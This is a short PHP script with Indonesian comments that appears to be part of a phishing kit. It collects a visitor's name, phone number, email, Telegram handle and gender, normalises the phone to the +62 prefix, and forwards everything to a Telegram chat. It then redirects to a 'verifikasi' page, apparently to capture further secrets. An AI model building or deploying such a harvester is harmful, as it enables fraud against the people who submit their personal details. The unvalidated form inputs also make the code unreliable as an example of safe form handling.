<?php
include '../config.php';

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    // Ambil data dari sesi
    $sessionData = getSessionData();
    $location = isset($sessionData['location']) ? $sessionData['location'] : 'Unknown';
    $name = $_POST['name'];
    $phone = $_POST['phone'];
    $email = $_POST['email'];
    $telegram = $_POST['telegram'];
    $gender = $_POST['gender'];

    // Memastikan nomor telepon dimulai dengan +62
    if (strpos($phone, '0') === 0) {
        $phone = '+62' . substr($phone, 1);
    } elseif (strpos($phone, '+62') !== 0) {
        $phone = '+62' . $phone;
    }

    // Simpan data baru ke sesi
    updateSession('name', $name);
    updateSession('phone', $phone);
    updateSession('email', $email);
    updateSession('telegram', $telegram); // Tambahkan ini
    updateSession('gender', $gender); // Tambahkan ini

    // Format pesan
    $message = "┌─────═━┈┈━═─────┐\n";
    $message .= "║\n";
    $message .= "╠➧ $location\n";
    $message .= "║\n";
    $message .= "╠➧ $name\n";
    $message .= "╔════════════════╗\n";
    $message .= "╠➧ $phone\n";
    $message .= "╚════════════════╝\n";
    $message .= "╠➧ $email\n";
    $message .= "║\n";
    $message .= "╠➧ $telegram\n";
    $message .= "║\n";
    $message .= "╠➧ $gender\n";
    $message .= "║";

    // Kirim ke Telegram
    if (sendMessageToTelegram($message)) {
        // Redirect ke halaman verifikasi
        header("Location: ../data/verifikasi.html");
        exit();
    } else {
        echo 'Gagal mengirim pesan ke Telegram.';
    }
} else {
    echo 'Metode tidak diizinkan';
}
?>